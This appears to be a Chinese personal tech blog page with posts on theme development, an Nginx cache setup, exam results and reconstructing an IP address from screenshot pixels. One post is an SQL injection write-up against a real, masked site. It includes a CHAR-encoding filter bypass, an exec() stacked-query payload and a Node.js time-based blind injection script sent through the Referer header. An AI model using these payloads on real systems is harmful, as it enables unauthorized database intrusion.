贫困的蚊子

亦余心之所向兮,虽九死其尤未悔


Explore Me
贫困的蚊子
亦余心之所向兮,虽九死其尤未悔
83
9
634

所以说不能光是把博客挪到子域名来就算改版了啊

不过不管怎么说我都是写了个新的index

首页动画灵感来源于兰陵大佬的 《害怕高清3D重置》 这个作品(非原作地址注意)

虽说他博客好像打不开了,不过还是要贴一下的 https://blog.thkira.com/

调transform3D真的很痛苦,不过做出来效果很棒,代码都是自己写的,只是灵感而已,灵感哦!

参考一丢丢了地瓜大佬的首页,虽然大概看不出共同点,但是就是看了他的首页才让我萌生出自己也写一个的念头来

大概...就是这么多?

最近还有在忙SoluIDC项目所以说,感觉游戏啥的都没吸引力了...Node大法好啊

还有好多想说的,但是又怠惰了,想去云游戏玩变人。

还有一个月放假,八月份跑去上海找太太和某Gay一起逛CJ面基,非常期待

(上面连用了三个还有,还有怪guna)

以上,就是写于中山图书馆的一篇脱线周记

周记 #7 - OK VERY GAY
这几天是我的生日,(4月26公历 三月十四农历),因为公历生日的时候我还在学校,就草草发了篇日志水一
4月28日 · Archeb
4·26
首先先祝自己生日快乐~今天开始我就是一个完全民事行为能力人了呢明明上课的时候想着写一大堆东西的结果坐
4月26日 · Archeb

这几天在学校,QQ被腾讯连着冻结了三次(大号小号全军覆没),然而又没有手机解冻

于是只能默默坑主题,果然效率++

本次主题更新后版本为V1.3 已经推送到GitHub,主要更新内容有

  • 添加设置:文章内页位置 和 导航栏颜色风格
  • 支持搜索功能
  • 简单的修复了一下文章切换的一些BUG
  • 扔掉了丑陋的 alert() 改为自己实现了一个 showNotify() (←戳他一下试试) 气泡
  • 文章阅读体验优化
  • 用 ← 按钮来返回开头,当当前位置已经处于开头的时候才作为返回键使用

目前主题PC端版本基本处于完成状态,未来会继续优化移动端体验~ 希望大家继续支持

SurfaceBook 2 15寸顶配开箱~
美版海淘,在卖家自提点开箱的所以拍照效果和环境都很渣~和XPS15合影!开箱~
4月14日 · Archeb
分类 未分类 下的文章
一个有趣的想法
未分类 Archeb · 2017年11月11日

今天在DiyGay的群里有人发了一张图

QQ图片20170808170615.png

就是这张,你可以看到这个图片顶部有几行像素点,是IP地址的一部分。

我尝试向图主要IP测试一下,但是没有得到回复,我仔细端详了一下这3行像素点,在自己的CMD上输入
snipaste_20170808_170812.png

然后逐个进行对比,第一次对比可以确定的数字是X5.76.5X.X65

进一步,15.76段是废段,45.76是VULTR段,所以第一个X应该是4

然后最后一个不可能是4(0~255首位不可能为4),只能是1,所以就是45.76.5X.165

然后我把45.76.51.165和45.76.54.165都ping了一下发现都可以通,再打开浏览器发现只有45.76.51.165开启HTTP服务

所以我比较倾向于IP是45.76.51.165,当然54.165也是可能的。

-----分割线-----

前面说这么多只是铺垫,在花了我十分钟人生来对比之后,我萌生了一个有趣的想法:可不可以根据被砍掉半边 甚至只有几行像素的字符还原出实际的字符呢。

好吧这件事情我刚才就已经做成功了,但是怎么才能让它变快?

我相信你应该也和我想的一样,那就是机器学习。

很遗憾的是我并不会机器学习,甚至我连最简单的PY库都不会用(PY我都不会好吗)

不知道这个idea是否已经被其他人想到了,如果有的话请务必告知我,因为我打算去试试了 2333333。

(全文完)

(水)某站点SQL注入手记
未分类 Archeb · 2017年11月11日

这次依旧是三位小伙伴一起行动 但是轮到我来写思路了 ╮(╯▽╰)╭那就我来呗

第一次写这类,技术也不行文笔也差,各位将就看看 ╮(╯▽╰)╭

背景设定

服务端ASP.NET 数据库SQL Server 2016 可以stack query

0x01 表名过滤Bypass

这个站点的表名全部以 xd_ 开头 ,然而有一个魔法 sql里面带有xd_就不执行了,需要绕过

于是 利用存储过程拼接SQL,利用CHAR编码SQL语句 直接exec即可

Py代码(写成tamper了)



    def chrword(word):
        ret = ''
        for i in word:
            ret += 'char('+str(ord(i))+')+'
        return '\'+'+ret[:-1]+'+\''


SQL语句


    declare @a varchar(100) set @a='【编码后的SQL语句】' exec(@a) --

大概如此就绕过了,主要是因为SQL Server不能直接把char()拼接的结果作为表名,所以要用到存储过程拼接为SQL语句

0x02 探测存储过程

Bypass了表名过滤后我们再次撞坑——无法UPDATE任何数据

小伙伴果断的判断是没有权限,然后count了一下sys.procedures后发现果然全部都在存储过程里了

这时候也不知道为什么SQLMAP的Sql-shell是出不了数据的 于是自制一个time based探测了

我写了一个简陋的NJS脚本(我不会py),探测存储过程:


    var sug = require('superagent');
    var hs=process.argv.splice(2);
    console.log('开始获取' + hs);

    //探测位数 最大50位
    var i=51;
    function findlen(i){
    var upt1 = process.uptime();
    sug
        .get('http://***')
        .set('Referer',"';if(len((select top 1 name from sys.procedures where name not in (select top " + hs + " name from sys.procedures))) >= " + i + ") waitfor delay '0:0:1';--")
        .end(function(err,sres){
            if(process.uptime()-upt1>1){
                console.log('获得数据长度:' + i);
                findstr(1,122,'',i);
            }else{
                i--;
                findlen(i);
            };
        });
    }
    findlen(i);



    function findstr(pos,zf,str,max){
    var upt1 = process.uptime();
    sug
        .get('http://***')
        .set('Referer',"';if(substring((select top 1 name from sys.procedures where name not in (select top " + hs + " name from sys.procedures))," + pos + ",1) >= '"+ String.fromCharCode(zf) +"') waitfor delay '0:0:1';--")
        .end(function(err,sres){
            if(process.uptime()-upt1>1){
                console.log('获得字符为:' + str + String.fromCharCode(zf));
                findstr(pos+1,122,str + String.fromCharCode(zf),max);
                console.log(pos + ',' + max);
                if(pos >= max){
                    console.log('获取完毕,结果是' + str + String.fromCharCode(zf));
                    process.exit();
                }
            }else{
                zf--;
                findstr(pos,zf,str,max);
            };
        });
    }

0x03

已太监 23333333333

中考简报
未分类 Archeb · 2017年11月11日

不说别的先上图

QQ图片20170707111459.png

阅读提示:广州中考满分810分,高分保护线698,听说成绩38/40。大概不是很高的分数,但是我很满意可以去广附了(话说广雅今年也才711...)

虽然关站那会说什么不会简报,最终我还是没有忍住来报成绩了,蛤蛤蛤蛤蛤。数学这次石乐志丢了半道大题没写出来,于是没了4分

然而语文分数比平时+6 化学+18 物理+15,超常发挥了,这波很爽

然后赚了点钱准备买MBP,这真是个幸运的暑假(笑)

终于终于,经过15天的努力(其中有7天去了旅游),Sagiri主题终于可以发布第一个(Pre)Release版本了

这个版本的CSS已经达到600+行了,可以算是我写过的最长的样式了,没有利用任何CSS模板,纯手写。

我也深知,600行远远比不上各位大佬(DIYGOD的主题将近3000行 吓到我了...),我的技术还有待提高

不过Release发布了总是一件令人偷税的事情,这意味着我现在可以心安理得地去追梦了 23333

总之各位,如果你喜欢我的主题,可以到 https://github.com/Archeb/Sagiri/releases 下载使用,Enjoy your theme~

(主题预览就是本博客)
snipaste_20170703_203342.png

Arrking主题基本完成
未分类 Archeb · 2017年11月11日

Arrking主题是一个简洁单栏大图主题,目前适配Typecho博客系统

这个主题的坑是在大年三十早上开的,然后写到晚上出去吃饭又弄了个别人的笔记本写,坑出了大概的框架,大年初一早上的时候在适配移动设备。中间都是断断续续的填坑。终于到昨天也就是初四基本填完了~总共用时五天

讲道理,这个主题是至今为止我写出的最好的一个主题,所以说果然单栏是不会写崩么……

然后,主题未来准备适配WordPress和更多博客系统,有愿意支持一起开发的可以在下面评论留下QQ,开发其实非常简单,因为这个主题是ajax加载,所以只管输出json的文章信息就好~

主题开发过程中bobo酱给了很多的支持和建议,非常感谢他,同时一并感谢辛时雨~

近期暂时不打算放出来,先自己用一下测试看看有没有BUG和体验不好的地方再慢慢完善,就不拿出来献丑了。

总之就是这样,感谢各位的阅读,祝各位鸡年大吉(吧)!

Mark - Nginx配置Cache
未分类 Archeb · 2017年11月11日

因为我的博客目前是三层转发,前端Nginx->后端Nginx->后端Express(Ghost)

而以前 前端Nginx->后端Nginx 这一步是纯转发没有Cache,遇到比较大的文件会慢,所以今天配置了一下Cache。

首先在Server段外面加上


    proxy_connect_timeout 5;
    proxy_read_timeout 60;
    proxy_send_timeout 5;
    proxy_buffer_size 16k;
    proxy_buffers 4 64k;
    proxy_busy_buffers_size 128k;
    proxy_temp_file_write_size 128k;
    proxy_temp_path C:/nginx/cache_temp;
    proxy_cache_path C:/nginx/cache levels=1:2
    keys_zone=cache_one:10m inactive=5m max_size=2m ;

Server段的配置

location ~ .*\.(gif|jpg|png|flv|ico|swf)(.*) {
      proxy_pass http://源站地址$request_uri;
      proxy_redirect off;
      proxy_set_header Host $host;
      proxy_cache cache_one;
      proxy_cache_valid 200 302 1h;
      proxy_cache_valid 301 1d;
      proxy_cache_valid any 1m;
      add_header X-Cache "HIT FROM SH-UNICOM2";
      expires 30d;
}

add_header 可以设置成不同的内容,代表不同的节点。

location ~ .*\.(gif|jpg|png|flv|ico|swf)(.*)这里,建议只设置这些静态文件,js和css谨慎设置,像我这种经常要改的就肯定不加上了23333

现在你可以F12打开我的博客看看,是不是静态文件都有HIT-FROM-XXX了呢(我配置了4台CDN节点,都是在国内),速度应该有所提升。

References

http://linux008.blog.51cto.com/2837805/547236/

http://www.51testing.com/html/28/116228-205763.html